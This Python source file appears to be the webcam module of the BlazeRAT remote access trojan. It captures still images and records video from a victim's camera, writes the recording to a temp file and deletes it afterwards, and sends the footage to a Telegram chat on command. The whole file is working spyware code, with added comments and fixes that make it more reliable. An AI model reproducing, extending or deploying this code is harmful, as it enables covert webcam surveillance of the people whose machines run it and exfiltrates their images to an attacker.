123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152 |
- from io import BytesIO
- from core.logger import Log
- from os import path, remove
- from threading import Thread
- from tempfile import gettempdir
- from core.messages import services as Messages
- from cv2 import VideoCapture, VideoWriter, VideoWriter_fourcc,\
- flip, imencode
- """
- Author : LimerBoy
- github.com/LimerBoy/BlazeRAT
- Notes :
- This module captures photos and records
- videos from the webcam
- """
# Shared recorder state, read and written by the capture helpers below:
#   r      - True while a video recording is in progress
#   t      - thread running the recording loop
#   camera - capture device used by the active recording
#   output - video writer receiving the recorded frames
r = False
t = None
camera = None
output = None
# Recordings are written to this file inside the system temp directory
file = path.join(gettempdir(), "webcamera.avi")
- """ Check camera by index """
def _CheckCamera(device: int = 0) -> bool:
    """
    Probe the camera with the given index.

    Opens the device, notes whether it reports itself as opened and
    releases it again before returning that status.
    """
    probe = VideoCapture(device)
    opened = probe.isOpened()
    probe.release()
    return opened
- """ Capture image """
def _CaptureImage(device: int = 0) -> "bytes | bool":
    """
    Capture a single JPEG image from the camera.

    :param device: index of the camera to open.
    :return: JPEG-encoded image bytes, or False when the camera cannot
        be opened, no frame could be read, or encoding failed.
    """
    capture = VideoCapture(device)
    try:
        if not capture.isOpened():
            return False

        # Read 15 frames and keep the last one that was read successfully
        # (presumably the early frames are skipped so the sensor can
        # settle - TODO confirm).
        image = None
        for _ in range(15):
            success, frame = capture.read()
            if success:
                image = frame
    finally:
        # Release the device on every path, including the early return
        capture.release()

    # Without a frame there is nothing to encode; imencode would raise
    if image is None:
        return False

    encoded, buffer = imencode(".jpg", image)
    if not encoded:
        return False
    return buffer.tobytes()
- """ Capture video from camera """
def _CaptureVideo(device: int = 0) -> None:
    """
    Record frames from the camera into the temporary video file.

    Marks the recording as running, opens the capture device and an
    XVID writer (20 fps, 640x480), then writes flipped frames until the
    running flag is cleared, the device is no longer opened, or a frame
    cannot be read.
    """
    global r, camera, output, file
    r = True
    camera = VideoCapture(device)
    codec = VideoWriter_fourcc(*"XVID")
    output = VideoWriter(file, codec, 20.0, (640, 480))

    while r and camera.isOpened():
        grabbed, frame = camera.read()
        if not grabbed:
            break
        # Flip code 0 is passed straight to cv2.flip for every frame
        output.write(flip(frame, 0))
- """ Asynchronously capture video from camera """
def _StartAsync(device: int = 0) -> bool:
    """
    Start recording video from the camera in a background thread.

    :param device: index of the camera to record from.
    :return: True when the recording thread was started, False when a
        recording is already running or the thread could not be started.
    """
    global r, t
    if r:
        return False
    # Mark the recording as running before the worker starts, so a second
    # call arriving right away cannot launch another recording.
    r = True
    try:
        t = Thread(target=_CaptureVideo, args=(device,))
        t.start()
    except Exception as error:
        print(error)
        r = False
        # Report the failure explicitly: the caller compares the result
        # with False, so an implicit None would be treated as success.
        return False
    return True
- """ Stop webcam capture """
def _Stop() -> "BytesIO | bool":
    """
    Stop the running recording and return the recorded video.

    :return: False when no recording is running; otherwise an in-memory
        binary stream holding the recorded video, positioned at the start.
    """
    global r, t, camera, output, file
    if not r:
        return False
    # Clearing the flag ends the capture loop; wait for the worker to exit
    r = False
    t.join()

    camera.release()
    output.release()

    # Load the recording into memory and close the file before deleting it:
    # removing a file that is still open fails on Windows, and returning the
    # open handle left it unclosed.
    with open(file, "rb") as recording:
        content = BytesIO(recording.read())
    # Keep the file name available to consumers that inspect ``.name``
    content.name = file
    remove(file)
    return content
- """ Handle telegram command """
def Handle(callback: dict, bot) -> None:
    """
    Handle a webcam command received from a Telegram callback query.

    The callback data selects the action ("Screenshot", "Enable" or
    "Disable") and may end with "_<index>" to choose the camera.

    :param callback: callback query; ``data``, ``from_user.id`` and
        ``message.message_id`` are read from it.
    :param bot: bot object used to send chat actions, messages and media.
    """
    text = callback.data
    chatid = callback.from_user.id
    device = 0

    if "_" in text:
        try:
            device = int(text.split("_")[-1])
        except ValueError:
            # A non-numeric suffix is not a camera index; keep the default
            device = 0

    if "Screenshot" in text:
        bot.send_chat_action(chatid, "upload_photo")

        if not _CheckCamera(device):
            return bot.send_message(chatid, Messages.webcam_failed_open % device)

        Log(f"Webcam >> Create screenshot from device {device}", chatid)

        screenshot = _CaptureImage(device)
        if screenshot is not False:
            bot.send_photo(
                chatid,
                photo=screenshot,
                caption=Messages.webcam_screenshot_captured,
            )
        else:
            bot.send_message(chatid, Messages.webcam_failed_open % device)

    if "Enable" in text:

        if not _CheckCamera(device):
            return bot.send_message(chatid, Messages.webcam_failed_open % device)

        Log(f"Webcam >> Start video recording from device {device}", chatid)

        # Only a truthy result means the recording started; a None result
        # must not be reported as success.
        if _StartAsync(device):
            bot.send_message(chatid, Messages.webcam_recording_started)
            bot.send_chat_action(chatid, "record_video")
        else:
            bot.send_message(chatid, Messages.webcam_recording_not_stopped)

    elif "Disable" in text:

        video = _Stop()
        if video is not False:
            Log(f"Webcam >> Stop video recording from device {device}", chatid)
            bot.send_chat_action(chatid, "upload_video")
            try:
                bot.send_video_note(
                    chatid, video,
                    reply_to_message_id=callback.message.message_id,
                )
            finally:
                # The stream is no longer needed once the upload finished
                # or failed; close it so the handle is not leaked.
                video.close()
            bot.send_message(chatid, Messages.webcam_recording_stopped)
        else:
            bot.send_message(chatid, Messages.webcam_recording_not_started)
|